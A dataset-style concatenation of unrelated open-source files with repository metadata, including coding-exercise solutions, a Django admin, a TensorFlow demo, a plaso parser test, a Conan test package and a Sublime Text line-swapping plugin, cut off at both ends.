'OmxVenc', 'OmxCore', 'yuv',
'bz2', 'cutils', common, 'json', messaging, visionipc])
|
[
"8837066+kegman@users.noreply.github.com"
] |
8837066+kegman@users.noreply.github.com
|
|
f0f3d9ede2624be9ecb55304fb9360137bbef785
|
cf7c928d6066da1ce15d2793dcf04315dda9b9ed
|
/Jungol/Lv1_LCoder_Python/pyg0_함수3/Main_JO_406_함수3_자가진단6.py
|
9cb189b371e5e8cb5f56948b15f087c90bbe53ef
|
[] |
no_license
|
refresh6724/APS
|
a261b3da8f53de7ff5ed687f21bb1392046c98e5
|
945e0af114033d05d571011e9dbf18f2e9375166
|
refs/heads/master
| 2022-02-01T23:31:42.679631
| 2021-12-31T14:16:04
| 2021-12-31T14:16:04
| 251,617,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
# 9자리 이하의 자연수를 입력받아 재귀함수를 이용하여 각 자리 숫자의 제곱의 합을 출력하는 프로그램을 작성하시오.
def recursive(n):
if n < 10:
return n*n
return recursive(n//10) + recursive(n%10)
n = int(input())
print(recursive(n))
|
[
"refresh6724@gmail.com"
] |
refresh6724@gmail.com
|
01ecef42b6e7f285755d7f03e8bb2dcc7c993ecf
|
b532a2188d312a377ea89192569897714f500980
|
/memorious/operations/store.py
|
52c9e9a5bb52970965df0014bb536fb4c9aec676
|
[
"MIT"
] |
permissive
|
patcon/memorious
|
b41baff81656c343770d9bec8743a7f710daac1b
|
316a4bc15a83065106de7e34935b77f337bb11e6
|
refs/heads/master
| 2021-08-20T00:32:33.320287
| 2017-11-27T13:53:44
| 2017-11-27T13:53:44
| 112,242,987
| 0
| 0
| null | 2017-11-27T20:08:07
| 2017-11-27T20:08:07
| null |
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
import os
import json
import shutil
from normality import safe_filename
from memorious import settings
def _get_directory_path(context):
    """Get the storage path for the output.

    Base path is settings.BASE_PATH/store, overridable via the crawler's
    'path' param; the crawler name is appended as a subdirectory.
    """
    path = os.path.join(settings.BASE_PATH, 'store')
    path = context.params.get('path', path)
    path = os.path.join(path, context.crawler.name)
    path = os.path.abspath(os.path.expandvars(path))
    try:
        os.makedirs(path)
    except OSError:
        # Usually the directory simply exists already. The original bare
        # `except:` swallowed *every* exception (even KeyboardInterrupt);
        # OSError keeps the best-effort behavior without hiding real bugs.
        pass
    return path
def directory(context, data):
    """Store the collected files to a given directory.

    Skips responses that are not OK or lack a content hash; otherwise copies
    the payload into the crawler's store directory and writes a JSON sidecar
    with the crawl metadata.
    """
    with context.http.rehash(data) as result:
        if not result.ok:
            return
        content_hash = data.get('content_hash')
        if content_hash is None:
            context.emit_warning("No content hash in data.")
            return
        path = _get_directory_path(context)
        file_name = data.get('file_name', result.file_name)
        file_name = safe_filename(file_name, default='raw')
        # Prefix with the content hash so equal names with different
        # payloads cannot collide.
        file_name = '%s.%s' % (content_hash, file_name)
        data['_file_name'] = file_name
        file_path = os.path.join(path, file_name)
        if not os.path.exists(file_path):
            shutil.copyfile(result.file_path, file_path)
        context.log.info("Store [directory]: %s", file_name)
        # Metadata sidecar, keyed by content hash.
        meta_path = os.path.join(path, '%s.json' % content_hash)
        with open(meta_path, 'w') as fh:
            json.dump(data, fh)
|
[
"friedrich@pudo.org"
] |
friedrich@pudo.org
|
43a4347035b0440386c7229b773e43eacc80d101
|
27010a7ad70bf69511858a91d42dc7a64e61b66d
|
/src/0342_power_of_four.py
|
76a22ceba8325a13c2b1e510bd9f19870f9f5a0f
|
[
"Apache-2.0"
] |
permissive
|
hariharanragothaman/leetcode-solutions
|
fb7d967f2c6e3f4c936e3c7afe369415bc8d2dc6
|
44e759f80d3c9df382fdf8d694d6378881e3649d
|
refs/heads/master
| 2023-09-03T20:31:59.200701
| 2021-10-18T00:50:56
| 2021-10-18T00:50:56
| 267,927,538
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
"""
Given an integer n, return true if it is a power of four. Otherwise, return false.
An integer n is a power of four, if there exists an integer x such that n == 4x.
Example 1:
Input: n = 16
Output: true
Example 2:
Input: n = 5
Output: false
Example 3:
Input: n = 1
Output: true
Constraints:
-231 <= n <= 231 - 1
"""
import math
from math import log2
class Solution:
    def isPowerOfFour(self, n: int) -> bool:
        """Return True iff n == 4**x for some integer x >= 0.

        Pure integer check: a power of four is a positive number with
        exactly one set bit (n & (n - 1) == 0) sitting on an even bit
        position (covered by the 0b0101... mask). This replaces the
        original float-based log2 test, which relied on floating-point
        exactness for large n.
        """
        return n > 0 and n & (n - 1) == 0 and n & 0x5555555555555555 != 0
|
[
"hariharanragothaman@gmail.com"
] |
hariharanragothaman@gmail.com
|
f6c388f9433fe0af9510b9b05baaba3657776db1
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_126/128.py
|
0b43d4fbaa876ff9dcf5d33290291df8461be100
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,683
|
py
|
import os
import unittest
import itertools
from python_toolbox.cute_iter_tools import consecutive_pairs
PROB_NAME = 'consonants'
INPUT_TYPE = 'large'
VOWELS = 'aeiou'


def solve(case):
    """Count substrings of *name* containing a run of >= n consonants.

    *case* is a (name, n) tuple. Scans once, and whenever a consonant run
    reaches length n, counts the substrings whose newest n-consonant window
    ends at the current position, excluding those already counted for an
    earlier window.
    """
    word, run_len = case
    size = len(word)
    run = 0          # length of the current consonant run
    prev_end = 0     # end index of the previously counted window
    total = 0
    for pos, ch in enumerate(word):
        run = run + 1 if ch not in VOWELS else 0
        if run < run_len:
            continue
        start = pos - run_len + 1
        # Leftmost allowed substring start, avoiding double counting.
        if run > run_len:
            window_start = start
        elif run_len == 1:
            window_start = prev_end + 1
        else:
            window_start = (prev_end - run_len + 2) if prev_end > 0 else 0
        prev_end = pos
        left = max(start - window_start + 1, 1)
        right = size - pos
        total += left * right
    return total
def read_case(lines):
    """Consume the first line of *lines* and return it as a (name, n) case."""
    word, count = lines.pop(0).split()
    return (word, int(count))
def read_file(filepath):
    """Read the input file and return a list of cases in a tuple format."""
    with open(filepath, 'rt') as fobj:
        lines = fobj.readlines()
    # First line holds the case count; read_case consumes one line per case.
    num_cases = int(lines.pop(0))
    return [read_case(lines) for _ in range(num_cases)]
def write_results(results, outfile):
    """Write one 'Case #i: result' line per result to *outfile* (1-based)."""
    with open(outfile, 'wt') as f:
        for num, res in enumerate(results, start=1):
            f.write('Case #{}: {}\n'.format(num, res))
def main(infile, outfile):
    """Solve every case in *infile* and write the answers to *outfile*."""
    cases = read_file(infile)
    results = [solve(case) for case in cases]
    write_results(results, outfile)
# NOTE: runs at *import* time (no __main__ guard): solves
# io/<prob>_<type>.in into the matching io/<prob>_<type>.out file.
if INPUT_TYPE:
    main(os.path.join('io', '{}_{}.in'.format(PROB_NAME, INPUT_TYPE)),
         os.path.join('io', '{}_{}.out'.format(PROB_NAME, INPUT_TYPE)))
class UnitTest(unittest.TestCase):
    """Spot checks for solve() against known sample answers."""

    CASES = {('quartz', 3): 4,
             ('straight', 3): 11,
             ('gcj', 2): 3,
             ('tsetse', 2): 11,
             ('pack', 1): 9}
    # ('packmyboxwithfivedozenliquorjugs', 1): 516}
    # ('z' * 10 ** 6, 4): 0}

    def runTest(self):
        message = 'Wrong result for case.\nCase: {}\nResult: {}\n'\
                  'Expected result: {}'
        # dict.iteritems() exists only on Python 2; items() works on 2 and 3.
        for case, expected in self.CASES.items():
            actual = solve(case)  # compute once instead of three times
            self.assertEqual(actual, expected,
                             message.format(case, actual, expected))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
5eb911a7220230a00c7447f3afc31e62046a0e8e
|
36ff0f28aeb47c03d8e22f69057c12f830e917e8
|
/Blog/admin.py
|
55f78d419afa2db728fbf7600fa18758d465be30
|
[] |
no_license
|
michael-basweti/duke
|
673721540fa1b260508f03518b0043e8e1fc3f14
|
5eae51ceac89e77c6ab712e6311fef9f15fb51ad
|
refs/heads/master
| 2022-12-06T02:53:04.494299
| 2019-07-30T10:47:06
| 2019-07-30T10:47:06
| 195,955,279
| 0
| 0
| null | 2022-11-22T04:09:15
| 2019-07-09T07:25:08
|
CSS
|
UTF-8
|
Python
| false
| false
| 306
|
py
|
from django.contrib import admin
from .models import Blog
class Post(admin.ModelAdmin):
    """Admin for Blog posts; the author is stamped from the logged-in user."""
    exclude = ('author',)
    list_display = ('title', 'author', 'date_added')
    def save_model(self, request, obj, form, change):
        # The author field is excluded from the form, so set it here.
        obj.author = request.user
        obj.save()
admin.site.register(Blog, Post)
|
[
"baswetima@gmail.com"
] |
baswetima@gmail.com
|
19a633a72dd7eb16a803a4443726aff405985b67
|
836705d3c321ea8e62f3b2a0ea7e837fe5d45dfd
|
/3-1.py
|
164f25998bf0219f9aa1f0012d4645ca8930a802
|
[] |
no_license
|
Accomlish/tensorflow_learn
|
e11acedbb81f9ef08866a15daf5155853d81cb49
|
19126ae75e1460aa0bb3bd041d96f99db56181d0
|
refs/heads/master
| 2021-05-22T16:50:09.878737
| 2020-04-04T14:36:22
| 2020-04-04T14:36:22
| 253,009,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,473
|
py
|
"""
回归的例子
非线性回归例子
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
#使用numpy生成500样本点
x_data = np.linspace(-1,1,500)[:,np.newaxis]
print(x_data.shape)
noise = np.random.normal(0,0.5,x_data.shape)
y_data = np.square(x_data) + noise
#定义连个placeholder
x = tf.placeholder(tf.float32,[None,1])#浮点型数据,n行1列
y = tf.placeholder(tf.float32,[None,1])
#定义神经网络中间层,
Weight_L1 = tf.Variable(tf.random_normal([1,10]))
biases_L1 = tf.Variable(tf.zeros([1,10]))
Wx_plus_L1 = tf.matmul(x,Weight_L1)+ biases_L1
L1 = tf.nn.tanh(Wx_plus_L1)
#定义输出层
Weight_L2 = tf.Variable(tf.random_normal([10,1]))
biases_L2 = tf.Variable(tf.zeros([1,1]))
Wx_plus_L2 = tf.matmul(L1,Weight_L2) + biases_L2
prediction = tf.nn.tanh(Wx_plus_L2)
#二次代价函数
loss = tf.reduce_mean(tf.square(y-prediction))
#使用梯度下降法
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(2000):
sess.run(train_step,feed_dict={x:x_data,y:y_data})
#获得预测值
prediction_value = sess.run(prediction,feed_dict={x:x_data})
#画图
plt.figure()
plt.scatter(x_data,y_data)
plt.plot(x_data,prediction_value,'r-',lw=5)
plt.show()
|
[
"your email"
] |
your email
|
d1143635201d221e500300bb7ebd02e942d5c100
|
b3b38ebf386bbd323d832ee077ae249a6ab331e9
|
/Day 25/Day 25.py
|
ef5461ad1763efb757ef34109cad57f402fc1d04
|
[] |
no_license
|
bakkerjangert/AoC_2017
|
7bae1b1b9da5b2263d911eff5bbadc2849716be6
|
1c36b80965875cdcbc50c6abe75cc5def72ee573
|
refs/heads/master
| 2023-02-03T05:19:55.933367
| 2020-12-18T14:39:40
| 2020-12-18T14:39:40
| 322,620,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,906
|
py
|
# Turing-machine tape state (AoC 2017 day 25 style): start in state A,
# run a fixed number of steps over a tape of 0/1 cells that grows on demand.
state = 'A'
steps = 12172063

data = [0]   # the tape; grows at either end as the head moves past it
index = 0    # current head position within `data`


def move_left(index):
    """Move the head one cell left, growing the tape at the front if needed."""
    if index == 0:
        data.insert(0, 0)  # new leftmost cell; head stays at position 0
        return index
    return index - 1


def move_right(index):
    """Move the head one cell right, growing the tape at the end if needed."""
    if index == len(data) - 1:
        data.append(0)
    return index + 1
# Run the machine for `steps` iterations. Each state block encodes one row
# of the puzzle's transition blueprint: (value to write, head move, next
# state) for the cell values 0 and 1.
for step in range(steps):
    if step % 10000 == 0:
        # Coarse progress indicator; printing every step would dominate runtime.
        print(f'Currently at {round(step / steps * 100, 2)}%')
    if state == 'A':
        if data[index] == 0:
            data[index] = 1
            index = move_right(index)
            state = 'B'
        else:
            data[index] = 0
            index = move_left(index)
            state = 'C'
    elif state == 'B':
        if data[index] == 0:
            data[index] = 1
            index = move_left(index)
            state = 'A'
        else:
            data[index] = 1
            index = move_left(index)
            state = 'D'
    elif state == 'C':
        if data[index] == 0:
            data[index] = 1
            index = move_right(index)
            state = 'D'
        else:
            data[index] = 0
            index = move_right(index)
            state = 'C'
    elif state == 'D':
        if data[index] == 0:
            data[index] = 0
            index = move_left(index)
            state = 'B'
        else:
            data[index] = 0
            index = move_right(index)
            state = 'E'
    elif state == 'E':
        if data[index] == 0:
            data[index] = 1
            index = move_right(index)
            state = 'C'
        else:
            data[index] = 1
            index = move_left(index)
            state = 'F'
    elif state == 'F':
        if data[index] == 0:
            data[index] = 1
            index = move_left(index)
            state = 'E'
        else:
            data[index] = 1
            index = move_right(index)
            state = 'A'
# The diagnostic checksum is the number of 1s left on the tape.
print(f'The answer = {data.count(1)}')
|
[
"gert-jan.bakker@rhdhv.com"
] |
gert-jan.bakker@rhdhv.com
|
b286d2b08daca3903a5d072416370fd615da25e7
|
95b87a3c8f5492feb8c4faea9202c68f560544b5
|
/tests/parsers/mcafeeav.py
|
084d4b95a852fc78fac08e330c14e5a16a80d540
|
[
"Apache-2.0"
] |
permissive
|
sebdraven/plaso
|
82e87149e845347a0481d9908117c0c227960446
|
77c7f00f0f648b158bd9c9cc3f698dd5ff294b4d
|
refs/heads/master
| 2020-12-02T08:08:48.427006
| 2017-07-08T17:07:50
| 2017-07-08T17:07:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,402
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the McAfee AV Log parser."""
import unittest
from plaso.formatters import mcafeeav # pylint: disable=unused-import
from plaso.lib import timelib
from plaso.parsers import mcafeeav
from tests import test_lib as shared_test_lib
from tests.parsers import test_lib
class McafeeAccessProtectionUnitTest(test_lib.ParserTestCase):
  """Tests for the McAfee AV Log parser."""

  @shared_test_lib.skipUnlessHasTestFile([u'AccessProtectionLog.txt'])
  def testParse(self):
    """Tests the Parse function."""
    parser_object = mcafeeav.McafeeAccessProtectionParser()
    storage_writer = self._ParseFile(
        [u'AccessProtectionLog.txt'], parser_object)

    # The file contains 14 lines which results in 14 events.
    self.assertEqual(storage_writer.number_of_events, 14)

    # First event: only the timestamp is checked here.
    event = storage_writer.events[0]

    expected_timestamp = timelib.Timestamp.CopyFromString(
        u'2013-09-27 14:42:26')
    self.assertEqual(event.timestamp, expected_timestamp)

    # TODO: Test that the UTF-8 byte order mark gets removed from
    # the first line.

    # Test this entry:
    # 9/27/2013	2:42:26 PM	Blocked by Access Protection rule
    # SOMEDOMAIN\someUser	C:\Windows\System32\procexp64.exe	C:\Program Files
    # (x86)\McAfee\Common Framework\UdaterUI.exe	Common Standard
    # Protection:Prevent termination of McAfee processes	Action blocked :
    # Terminate
    event = storage_writer.events[1]

    expected_timestamp = timelib.Timestamp.CopyFromString(
        u'2013-09-27 14:42:39')
    self.assertEqual(event.timestamp, expected_timestamp)

    self.assertEqual(event.username, u'SOMEDOMAIN\\someUser')
    self.assertEqual(
        event.filename, u'C:\\Windows\\System32\\procexp64.exe')

    expected_message = (
        u'File Name: C:\\Windows\\System32\\procexp64.exe '
        u'User: SOMEDOMAIN\\someUser '
        u'C:\\Program Files (x86)\\McAfee\\Common Framework\\Frame'
        u'workService.exe '
        u'Blocked by Access Protection rule '
        u'Common Standard Protection:Prevent termination of McAfee processes '
        u'Action blocked : Terminate')
    expected_short_message = (
        u'C:\\Windows\\System32\\procexp64.exe '
        u'Action blocked : Terminate')

    self._TestGetMessageStrings(event, expected_message, expected_short_message)
|
[
"joachim.metz@gmail.com"
] |
joachim.metz@gmail.com
|
955e1f1ce5febef1ea2829471b58315b4d9b2f23
|
3eae9c14c119ee2d6a7d02ef1ba5d61420959e3c
|
/modules/core/rwvx/rwsched/src/rwsched_gi_filter.py
|
b06f9bbfdb82967c05b581ec652bad0f46393135
|
[
"Apache-2.0"
] |
permissive
|
RIFTIO/RIFT.ware
|
94d3a34836a04546ea02ec0576dae78d566dabb3
|
4ade66a5bccbeb4c5ed5b56fed8841e46e2639b0
|
refs/heads/RIFT.ware-4.4.1
| 2020-05-21T14:07:31.092287
| 2017-06-05T16:02:48
| 2017-06-05T16:02:48
| 52,545,688
| 9
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
#!/usr/bin/python
# STANDARD_RIFT_IO_COPYRIGHT
# -*- Mode: Python; py-indent-offset: 4 -*-
# vim: tabstop=4 shiftwidth=4 expandtab
import sys
# rwsched_instance_ptr_t -> RwschedInstance
# Per-depth name overrides for pieces that should not be plain title-cased
# (depth = position of the '_'-separated piece within the identifier).
renames = {
    0: {'rwsched': 'RwSched'},
    1: {'instance': 'Instance',
        'CFRunLoop': 'CFRunLoop',
        'CFRunLoopSource': 'CFRunLoopSource',
        'CFRunLoopTimer': 'CFRunLoopTimer',
        'CFRunLoopTimerContext': 'CFRunLoopTimerContext',
        'CFSocket': 'CFSocket' },
}


def gobjectify(ident):
    """Map an rwsched C identifier (e.g. rwsched_instance_ptr_t) to its
    GObject-style name (RwSchedInstance); anything else passes through."""
    if not ident.startswith('rwsched'):
        return ident

    # Strip C-style suffixes: 'ptr_t' first, then a trailing '_t' or 'Ref'.
    if ident.endswith('ptr_t'):
        ident = ident[:-5]
    if ident.endswith('_t'):
        ident = ident[:-2]
    elif ident.endswith('Ref'):
        ident = ident[:-3]

    pieces = ident.split('_')
    return ''.join(renames.get(depth, {}).get(piece, piece.title())
                   for depth, piece in enumerate(pieces))
if __name__ == '__main__':
    # Filter mode: read one identifier from stdin, emit the GObject name.
    text = gobjectify(sys.stdin.read().strip())
    sys.stdout.write(text)
|
[
"Leslie.Giles@riftio.com"
] |
Leslie.Giles@riftio.com
|
c834c39c8e08fc958e2256b388af4f839efe7988
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_pricier.py
|
17e602d16998edcee93d654fd2ff4a313028fae5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
#calss header
class _PRICIER():
def __init__(self,):
self.name = "PRICIER"
self.definitions = pricy
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pricy']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
020d3a02c9aba18d9ceb63b09b9389dd7f395e1e
|
c1bfadbc033efba287ad55a804e9d69d297c3bf2
|
/valohai_cli/commands/logout.py
|
bf4821b4666e80b85d595e51d78ca79a387cdd40
|
[
"MIT"
] |
permissive
|
valohai/valohai-cli
|
16560b078d20a02c8cdc7388beeea9bebac4be7d
|
c57cc164e749fb77b622d629a5ad05b2685534bb
|
refs/heads/master
| 2023-08-31T14:04:26.979762
| 2023-08-22T12:54:51
| 2023-08-22T12:54:51
| 81,329,264
| 14
| 5
|
MIT
| 2023-09-11T13:35:04
| 2017-02-08T12:46:54
|
Python
|
UTF-8
|
Python
| false
| false
| 735
|
py
|
import click
from valohai_cli.consts import yes_option
from valohai_cli.messages import success
from valohai_cli.settings import settings
@click.command()
@yes_option
def logout(yes: bool) -> None:
    """Remove local authentication token."""
    user = settings.user
    token = settings.token
    if not (user or token):
        # Nothing persisted: nothing to do.
        click.echo('You\'re not logged in.')
        return
    if user and not yes:
        # Interactive safety net: show who is logged in and require
        # confirmation before discarding the token (abort exits the command).
        click.confirm((
            f'You are logged in as {user["username"]} (on {settings.host}).\n'
            'Are you sure you wish to remove the authentication token?'
        ), abort=True)
    # Clear all persisted credentials, not just the token.
    settings.persistence.update(host=None, user=None, token=None)
    settings.persistence.save()
    success('Logged out.')
|
[
"akx@iki.fi"
] |
akx@iki.fi
|
3db2907e0ec1a60da6727317afaec49ef2217e4c
|
96ad67554b01832b873fc0bdab0c33aa2178a2fd
|
/3_visualExploratory/3_violationDistrict.py
|
ac3f3009cd46c72bad29b203a4a88e5a3d37b070
|
[] |
no_license
|
RobertNguyen125/Datacamp---Project-PoliceActivities
|
09447ee1290c40b3c038ccd387e80c7e703cb053
|
af14e4d7c4ff864f68cfa3aaecdfee9883c24659
|
refs/heads/master
| 2021-01-02T02:00:15.928445
| 2020-02-10T06:48:13
| 2020-02-10T06:48:13
| 239,445,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 812
|
py
|
# .crosstab(), short for cross_tabulation
import pandas as pd
import matplotlib.pyplot as plt

ri2 = pd.read_csv('/Users/apple/desktop/policeActivities/dataset/ri2.csv')

table = pd.crosstab(ri2['driver_race'], ri2['driver_gender']) # NOTE: frequency table in form of dataframe
print(table)

# check the result of frequency table
asian_female = ri2[(ri2['driver_gender']=='F') & (ri2['driver_race']=='Asian')]
print(asian_female.shape)

# label-based row slice; .loc is inclusive of both endpoints
table = table.loc['Asian':'Hispanic']
print(table)

# create stacked bar plot
# table.plot(kind='bar', stacked=True)
# plt.show()

# district violation
# create frequency table with distric and violation
all_zones = pd.crosstab(ri2['district'],ri2['violation'])
print(all_zones)

# slice the dataframe to get k1-k3:
k_zones = all_zones.loc['Zone K1': 'Zone K3']
print(k_zones)
|
[
"ngaduc92@gmail.com"
] |
ngaduc92@gmail.com
|
4fa0a7eb80583b752126f933c7de41b6086d7e94
|
f9e3a0fb511470561d3d94bc984dafaee06000cb
|
/9780596009250/PP3E-Examples-1.2/Examples/PP3E/System/App/Bases/app.py
|
9e971584749335e8bfed0687516b1d673471aca7
|
[
"LicenseRef-scancode-oreilly-notice"
] |
permissive
|
Sorath93/Programming-Python-book
|
359b6fff4e17b44b9842662f484bbafb490cfd3d
|
ebe4c93e265edd4ae135491bd2f96904d08a911c
|
refs/heads/master
| 2022-12-03T01:49:07.815439
| 2020-08-16T22:19:38
| 2020-08-16T22:19:38
| 287,775,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,823
|
py
|
################################################################################
# an application class hierarchy, for handling top-level components;
# App is the root class of the App hierarchy, extended in other files;
################################################################################
import sys, os, traceback
class AppError(Exception): pass                 # errors raised here

class App:                                      # the root class
    """Base class for top-level application components (Python 2).

    Wraps argv/environ access, stdin/stdout/stderr streams, and a
    start/run/stop execution protocol; subclasses redefine run().
    """
    def __init__(self, name=None):
        self.name    = name or self.__class__.__name__   # the lowest class
        self.args    = sys.argv[1:]
        self.env     = os.environ
        self.verbose = self.getopt('-v') or self.getenv('VERBOSE')
        self.input   = sys.stdin
        self.output  = sys.stdout
        self.error   = sys.stderr       # stdout may be piped
    def closeApp(self):                 # not __del__: ref's?
        pass                            # nothing at this level
    def help(self):
        print self.name, 'command-line arguments:'       # extend in subclass
        print '-v (verbose)'

    ##############################
    # script environment services
    ##############################

    def getopt(self, tag):
        """Return 1 and consume *tag* if present as a flag argument, else 0."""
        try:                            # test "-x" command arg
            self.args.remove(tag)       # not real argv: > 1 App?
            return 1
        except:
            return 0
    def getarg(self, tag, default=None):
        """Return and consume the value of a "-x val" pair, else *default*."""
        try:                            # get "-x val" command arg
            pos = self.args.index(tag)
            val = self.args[pos+1]
            self.args[pos:pos+2] = []
            return val
        except:
            return default              # None: missing, no default
    def getenv(self, name, default=''):
        try:                            # get "$x" environment var
            return self.env[name]
        except KeyError:
            return default
    def endargs(self):
        # Warn about (and drop) any arguments nothing consumed.
        if self.args:
            self.message('extra arguments ignored: ' + repr(self.args))
            self.args = []
    def restargs(self):
        res, self.args = self.args, []  # no more args/options
        return res
    def message(self, text):
        self.error.write(text + '\n')   # stdout may be redirected
    def exception(self):
        return tuple(sys.exc_info()[:2])  # the last exception type,data
    def exit(self, message='', status=1):
        if message:
            self.message(message)
        sys.exit(status)
    def shell(self, command, fork=0, inp=''):
        """Run a shell command: fork=0 inline, 1 capture output, else pipe input."""
        if self.verbose:
            self.message(command)           # how about ipc?
        if not fork:
            os.system(command)              # run a shell cmd
        elif fork == 1:
            return os.popen(command, 'r').read()  # get its output
        else:                               # readlines too?
            pipe = os.popen(command, 'w')
            pipe.write(inp)                 # send it input
            pipe.close()

    #################################################
    # input/output-stream methods for the app itself;
    # redefine in subclasses if not using files, or
    # set self.input/output to file-like objects;
    #################################################

    def read(self, *size):
        return self.input.read(*size)
    def readline(self):
        return self.input.readline()
    def readlines(self):
        return self.input.readlines()
    def write(self, text):
        self.output.write(text)
    def writelines(self, text):
        self.output.writelines(text)

    ###################################################
    # to run the app
    # main() is the start/run/stop execution protocol;
    ###################################################

    def main(self):
        """Run the start/run/stop protocol, reporting uncaught exceptions."""
        res = None
        try:
            self.start()
            self.run()
            res = self.stop()       # optional return val
        except SystemExit:          # ignore if from exit()
            pass
        except:
            self.message('uncaught: ' + str(self.exception()))
            traceback.print_exc()
        self.closeApp()
        return res
    def start(self):
        if self.verbose: self.message(self.name + ' start.')
    def stop(self):
        if self.verbose: self.message(self.name + ' done.')
    def run(self):
        raise AppError, 'run must be redefined!'
|
[
"Sorath.Soomro@isode.com"
] |
Sorath.Soomro@isode.com
|
1376fbee52bacc27bd80efd4d16b435c5e946b03
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/libnetfilter_queue/all/test_package/conanfile.py
|
1097433829a7c2a75801555fd3e085e9063cd7b5
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 469
|
py
|
import os
from conans import ConanFile, CMake, tools
class Libnetfilter_queueTestConan(ConanFile):
    """Conan test package: build the CMake example and run it (native builds only)."""
    settings = "os", "compiler", "build_type", "arch"
    generators = "cmake"

    def build(self):
        cmake = CMake(self)
        cmake.configure()
        cmake.build()

    def test(self):
        # The binary cannot run on the build host when cross-building.
        if not tools.cross_building(self):
            bin_path = os.path.join("bin", "example")
            # Run `example 0` inside the Conan run environment.
            self.run("{} {}".format(bin_path, 0), run_environment=True)
|
[
"noreply@github.com"
] |
conan-io.noreply@github.com
|
8263c0e2c597868a62777d0b2bf18d2d862238d2
|
632d7759536ed0726499c2d52c8eb13b5ab213ab
|
/Data/Packages/Default/swap_line.py
|
5c098bc61d83d61eb12c2cf637e2417ebeab613c
|
[] |
no_license
|
Void2403/sublime_text_3_costomize
|
e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc
|
c19977e498bd948fd6d8f55bd48c8d82cbc317c3
|
refs/heads/master
| 2023-08-31T21:32:32.791574
| 2019-05-31T11:46:19
| 2019-05-31T11:46:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,886
|
py
|
import sublime
import sublime_plugin
def expand_to_line(view, region):
    """
    As view.full_line, but doesn't expand to the next line if a full line is
    already selected
    """
    nonempty = region.a != region.b
    if nonempty and view.substr(region.end() - 1) == '\n':
        # Region already ends on a newline: only extend backwards to the
        # start of its first line.
        return sublime.Region(view.line(region).begin(), region.end())
    return view.full_line(region)
def extract_line_blocks(view):
    """Return the current selections expanded to whole-line blocks, with
    adjacent/overlapping blocks merged into one region each."""
    expanded = [expand_to_line(view, sel) for sel in view.sel()]
    if not expanded:
        return expanded

    merged = [expanded[0]]
    for region in expanded[1:]:
        tail = merged[-1]
        if region.begin() <= tail.end():
            # Touches or overlaps the previous block: extend it.
            merged[-1] = sublime.Region(tail.begin(), region.end())
        else:
            merged.append(region)
    return merged
class SwapLineUpCommand(sublime_plugin.TextCommand):
    """Move each selected block of full lines up by one line."""
    def run(self, edit):
        blocks = extract_line_blocks(self.view)

        # No selection
        if len(blocks) == 0:
            return
        # Already at BOF
        if blocks[0].begin() == 0:
            return

        # Add a trailing newline if required, the logic is simpler if every line
        # ends with a newline
        add_trailing_newline = (self.view.substr(self.view.size() - 1) != '\n') and blocks[-1].b == self.view.size()
        if add_trailing_newline:
            # The insert can cause the selection to move. This isn't wanted, so
            # reset the selection if it has moved to EOF
            sel = [r for r in self.view.sel()]
            self.view.insert(edit, self.view.size(), '\n')
            if self.view.sel()[-1].end() == self.view.size():
                # Selection has moved, restore the previous selection
                self.view.sel().clear()
                for r in sel:
                    self.view.sel().add(r)

            # Fix up any block that should now include this newline
            blocks[-1] = sublime.Region(blocks[-1].a, blocks[-1].b + 1)

        # Process in reverse order
        blocks.reverse()
        for b in blocks:
            # Copy the line above the block to just below it, then delete
            # the original copy — net effect: the block moves up one line.
            prev_line = self.view.full_line(b.begin() - 1)
            self.view.insert(edit, b.end(), self.view.substr(prev_line))
            self.view.erase(edit, prev_line)

        if add_trailing_newline:
            # Remove the added newline
            self.view.erase(edit, sublime.Region(self.view.size() - 1, self.view.size()))

        # Ensure the selection is visible
        self.view.show(self.view.sel(), False)
class SwapLineDownCommand(sublime_plugin.TextCommand):
    """Move each selected block of full lines down by one line."""
